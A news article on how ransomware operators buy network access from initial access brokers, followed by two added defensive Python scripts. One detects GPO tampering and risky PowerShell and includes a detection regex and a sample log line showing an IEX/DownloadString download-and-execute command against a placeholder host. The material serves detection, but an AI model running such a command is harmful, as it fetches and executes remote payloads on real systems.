Ransomware Actors, Access Brokers Form Lucrative Relationships

When ransomware crews need a way into a victim network, they turn to initial access brokers (also called access merchants): criminals who sell already-compromised network access to other cybercriminals.
As key enablers in the financially motivated cybercriminal underground, these brokers sell network access on popular cybercriminal forums, with prominent actors on the scene for more than a decade.
A report from Intel 471 examines the evolving relationship between the two and indicates that, as ransomware continues to proliferate, operators will increasingly recognize the benefits of buying access rather than obtaining it themselves.
Ransomware and Access Brokers: A Cyberunderground Ecosystem
Brad Crompton, CTI director at Intel 471, explained that both access brokers and ransomware operators exist across a complex cyberunderground ecosystem, operating on forums and marketplaces and, in some cases, only with trusted contacts.
“Currently within the cyberunderground, this relationship exists in two forms: Opportunistic and targeted,” he said.
In the opportunistic form, access brokers compromise organizations globally with no target list, then publicly offer the access for sale on several underground criminal forums or marketplaces.
“Subsequently, the access is bought, by chance, by ransomware operators,” Crompton explained.
He added that while the targeted form is much harder to observe and track, Intel 471 found that some ransomware operations have preferred access brokers whom they consistently use for access to corporate networks, effectively placing them on retainer for their services.
“This is becoming more common, however, not just with ransomware operators,” he said.
Access brokers who care more about their operational security (OPSEC) are choosing to do business only with trusted contacts across the cyberunderground, which again makes them harder to track and their operations harder to disrupt.
“Additionally, these access brokers who operate in this targeted manner will either have lists of organizations that, if compromised, they will make their chosen buyer aware of the access they have acquired, or will actively try to compromise set lists of businesses for their buyers,” he said.
Intel 471 also observed cases in which a victim appeared on a ransomware group's blog (leak site) before an access broker offered access to that same organization for sale.
Crompton said it is also possible that the access brokers work with the ransomware group and/or its affiliates to identify relevant information about the compromise, which in turn gives the broker an opportunity to use that information after the organization has been compromised.
John Bambenek, principal threat hunter at Netenrich, a security and operations analytics SaaS company, pointed out that the cybercrime ecosystem has developed specialized “career fields” in much the same way that cybersecurity has developed specializations.
“This means there are many more partnerships and boutique actors helping a variety of groups,” he said. “Getting initial access is a specialized skill set, just like money laundering in cryptocurrency and ransomware development are skill sets. This specialization makes the ecosystem more resilient and more difficult to bring to justice.”
Because the overall ransomware operation now involves more steps and more parties, he said, defenders gain additional points at which to detect and interdict it.
“PowerShell and GPOs are the soft underbelly of most organizations,” he explained. “If you tightly control those two things so nothing can get deployed enterprise-wide without strong controls, you’ll be doing well.”
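One way to put that advice into a detection, as an added example rather than anything from the article or from Netenrich: alert on Group Policy objects modified by accounts outside a small change-control group (Security event 5136 on a groupPolicyContainer object) and on PowerShell script blocks (PowerShell Operational event 4104) that carry the download-and-execute or mass-deployment idioms ransomware operators use to push a payload domain-wide. The event records, the approved-admin list and the 198.51.100.7 address are constructed for the example; only the event IDs and field names are real.

```python
"""Flag GPO changes and risky PowerShell script blocks in Windows event data.

Added example. The sample events below are constructed, modelled on the
fields of Security event 5136 (directory service object modified) and
Microsoft-Windows-PowerShell/Operational event 4104 (script block logged).
The GPO_ADMINS set is an assumption: the accounts allowed to change GPOs.
"""
import re
from dataclasses import dataclass

# Assumption: the only accounts permitted to modify Group Policy.
GPO_ADMINS = {"CORP\\gpo-svc", "CORP\\jdoe-adm"}

# PowerShell idioms that rarely appear in sanctioned enterprise-wide deployment.
RISKY_PS = re.compile(
    r"(-EncodedCommand|-enc\b|Invoke-Expression|\biex\b|DownloadString|"
    r"Invoke-WebRequest|Invoke-Command\s+-ComputerName|New-GPO|"
    r"Set-GPRegistryValue|vssadmin)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    event_id: int
    actor: str
    reason: str
    detail: str


def check_gpo_change(ev):
    """Event 5136 on a groupPolicyContainer by an account outside GPO_ADMINS."""
    if ev.get("EventID") != 5136 or ev.get("ObjectClass") != "groupPolicyContainer":
        return None
    actor = ev["SubjectDomainName"] + "\\" + ev["SubjectUserName"]
    if actor in GPO_ADMINS:
        return None
    return Finding(5136, actor, "GPO modified by account outside change control",
                   f"{ev['ObjectDN']} attr={ev['AttributeLDAPDisplayName']}")


def check_script_block(ev):
    """Event 4104 whose ScriptBlockText contains any RISKY_PS idiom."""
    if ev.get("EventID") != 4104:
        return None
    hits = sorted({m.group(0) for m in RISKY_PS.finditer(ev.get("ScriptBlockText", ""))})
    if not hits:
        return None
    return Finding(4104, ev.get("UserId", "?"), "risky PowerShell script block", ", ".join(hits))


def triage(events):
    """Run every check over every event; return the findings in event order."""
    findings = []
    for ev in events:
        for check in (check_gpo_change, check_script_block):
            f = check(ev)
            if f:
                findings.append(f)
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 5136, "ObjectClass": "groupPolicyContainer",
     "SubjectDomainName": "CORP", "SubjectUserName": "helpdesk01",
     "ObjectDN": "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "gPCMachineExtensionNames"},
    {"EventID": 5136, "ObjectClass": "groupPolicyContainer",
     "SubjectDomainName": "CORP", "SubjectUserName": "gpo-svc",
     "ObjectDN": "CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "versionNumber"},
    {"EventID": 4104, "UserId": "CORP\\helpdesk01",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"},
    {"EventID": 4104, "UserId": "CORP\\ops",
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Measure-Object"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.actor}: {f.reason} ({f.detail})")
```

Two of the four constructed events fire: the GPO edit by the help-desk account and the download-and-execute script block. The benign GPO change by the service account and the log-listing script block pass. In production the GPO check needs 5136 auditing enabled on the domain controllers and the script-block check needs PowerShell Script Block Logging turned on, both of which are themselves set through Group Policy.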
Bambenek added that ransomware is, fundamentally, the only real disaster recovery event organizations will have to prepare for.
“You can prevent most ransomware, but attackers are always evolving,” he said. “What you can prepare for is to have a rapid disaster recovery process and make sure your staff dusts off those CISSP books.”
Ivan Righi, senior cyber threat intelligence analyst at Digital Shadows, a provider of digital risk protection solutions, noted that the entire ransomware process has come to resemble a legitimate business, with groups learning the most effective ways to conduct attacks.
“It is faster and more cost-efficient for ransomware groups to simply purchase numerous accesses and conduct multiple attacks at once instead of spending a lengthy amount of time trying to break into one organization,” he said. “This means that attacks are moving away from ‘big game hunting’ and we are seeing smaller organizations being targeted by ransomware groups more frequently.”
Righi added that large ransomware groups will likely attempt to recruit more initial access brokers into their operations in the future.
“By working together with these threat actors, ransomware groups can increase the number of attacks they conduct, resulting in higher profits and a more prominent brand,” he said. “These relationships are likely to keep evolving and make the ransomware business more professionalized.”
To protect against these attacks, organizations should monitor criminal forums and marketplaces for exposures involving their own assets, such as stolen credentials or offers of access to their networks.
They should also enable two-factor authentication (2FA) wherever possible, minimize the attack surface of internet-facing remote services, take a risk-based approach to vulnerability management and patch high-risk vulnerabilities promptly.
“Protecting against these threat actors means shutting down as many vectors of attacks as possible,” Righi said. “While shutting down every attack vector is impossible, organizations that make themselves harder targets are less likely to be targeted and threat actors will typically move on to easier targets.”
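What a risk-based ordering of those controls looks like in practice, as an added example that is not from the article or from Digital Shadows: rank each exposed service by the properties a broker actually sells (reachable from the internet, interactive remote access, no MFA, a vulnerability known to be exploited) and attach the cheapest control that removes it from the market. The inventory is constructed; the `known_exploited` flag stands in for whatever exploitation feed the reader uses (CISA's KEV catalog, for instance) and the point weights are an assumption to be tuned.

```python
"""Risk-rank exposed remote services, the product initial access brokers sell.

Added example. The inventory is constructed, not from any real network.
Weights and the known_exploited flag are assumptions the reader adjusts
to their own environment and vulnerability data.
"""
from dataclasses import dataclass

# Service kinds that give an interactive foothold once credentials are held.
REMOTE_ACCESS_KINDS = {"rdp", "vpn", "citrix", "vnc", "ssh", "smb", "winrm"}


@dataclass(frozen=True)
class Exposure:
    host: str
    kind: str                # "rdp", "vpn", "https", ...
    internet_facing: bool
    mfa_enforced: bool
    known_exploited: bool    # a vuln on this version is exploited in the wild
    cvss_max: float = 0.0    # highest CVSS among open findings on the service


def score(e):
    """Return (score, reasons); higher means fix first. Weights are assumptions."""
    s, why = 0, []
    if e.internet_facing:
        s += 40; why.append("internet-facing")
    if e.kind in REMOTE_ACCESS_KINDS:
        s += 20; why.append("interactive remote access")
        # MFA only matters for the door the attacker can actually reach.
        if e.internet_facing and not e.mfa_enforced:
            s += 25; why.append("no MFA")
    if e.known_exploited:
        s += 30; why.append("known-exploited vulnerability")
    elif e.cvss_max >= 9.0:
        s += 15; why.append("critical CVSS, no known exploitation")
    elif e.cvss_max >= 7.0:
        s += 5; why.append("high CVSS")
    return s, why


def action(e):
    """The cheapest control that takes this exposure off a broker's price list."""
    if e.internet_facing and e.kind in REMOTE_ACCESS_KINDS and not e.mfa_enforced:
        return "enforce MFA or move behind an MFA-protected gateway"
    if e.known_exploited:
        return "patch now (actively exploited)"
    if e.internet_facing and e.kind in REMOTE_ACCESS_KINDS:
        return "restrict source IPs and confirm the service must be public"
    return "standard patch cycle"


def prioritise(exposures):
    """Sort by descending score (host name breaks ties) and pair with an action."""
    ranked = sorted(exposures, key=lambda e: (-score(e)[0], e.host))
    return [(e.host, score(e)[0], action(e)) for e in ranked]


# Constructed inventory using reserved documentation domains.
SAMPLE_EXPOSURES = [
    Exposure("rdp-jump.example.net", "rdp", True, False, False),
    Exposure("vpn.example.net", "vpn", True, True, True, 9.8),
    Exposure("intranet.example.net", "https", False, False, False, 9.1),
    Exposure("fs01.corp.example", "smb", False, False, True, 8.8),
]

if __name__ == "__main__":
    for host, s, act in prioritise(SAMPLE_EXPOSURES):
        print(f"{s:3d} {host:24s} {act}")
```

The ordering is the lesson: the MFA-protected VPN with an actively exploited bug still outranks the MFA-less jump host, and both outrank an internal file server and an internal web app with a CVSS 9.1 finding nobody is exploiting. Patching strictly by CVSS would have put the intranet server near the top and left the two services a broker would actually list for last.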
Crompton said that over the next six to 12 months this relationship is unlikely to change, with more “veteran” access brokers continuing to do business solely with ransomware groups.
“However, as more ransomware variants are developed, we will likely see access brokers conducting business with multiple groups in order to maximize their profits,” he explained. “Additionally, as new actors take up the access broker job role within the cyberunderground, it is highly likely that we will see a larger number of businesses impacted which, in turn, will likely result in a larger number of ransomware events.”
He added that it is also possible that ransomware operations will, if they have not already, fold the access merchant role into their own operations as a dedicated job that earns a cut of the profits, much as ransomware affiliates do.
“In terms of how IT security must evolve, the most important will be to increase cybersecurity mechanisms throughout the organization and utilize a CTI provider to stay one step ahead of the curve,” he said. “Prevention is better than a cure and IT security is no different.”